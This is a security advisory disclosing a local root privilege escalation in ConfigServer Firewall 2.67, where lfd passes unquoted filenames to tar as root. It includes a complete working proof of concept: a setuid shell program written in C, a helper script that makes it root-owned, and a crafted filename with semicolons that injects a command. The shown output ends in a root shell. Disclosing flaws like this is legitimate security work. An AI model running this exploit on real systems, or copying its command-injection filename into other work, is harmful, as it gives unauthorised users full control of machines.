CSF 2.67 - local root privilege escalation via `/bin/tar` command



DESCRIPTION


If the "LF_DIRWATCH_DISABLE" option is enabled in ConfigServer Firewall 2.67, then any suspicious files found by lfd when the dirfiles() subroutine is called will be placed into a tarball at /etc/csf/suspicious.tar. This is done by executing a command similar to the following as root:

tar --remove-files -rf /etc/csf/suspicious_files.tar $filename


Any local user can craft a filename containing shell metacharacters in order to execute commands as root. LF_DIRWATCH_DISABLE is set to 0 by default. Suspicious filetypes looked for in the dirfiles() subroutine include those that end in .pl, .cgi, .py, and more.



IMPACT


Command execution as root, full system compromise.



[user@host ~]$ cat > root.c << EOF
int main() {
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF
[user@host ~]$ gcc root.c -o root
[user@host ~]$ cd /tmp
[user@host /tmp]$ echo 'chown root.root /home/user/root ; chmod 4755 /home/user/root' > hax
[user@host /tmp]$ touch ';sh hax;.pl'

After about 1 minute...

[user@host ~]$ ls -l root
-rwsr-xr-x 1 root root 4950 Aug 24 07:57 root
[user@host ~]$ ./root
[root@host ~]# id
uid=0(root) gid=0(root) groups=500(user)


What's happening in the example above is that lfd is effectively running the following shell command as root from within the /tmp directory:

tar --remove-files -rf /etc/suspicious.tar ;sh hax


Since the semicolon is a metacharacter (that is, a character that, when unquoted, separates words, where "words" are a sequence of characters considered as a single unit by the shell), it allows us to terminate the tar command and start a new one - "sh hax" - which will execute the file called "hax".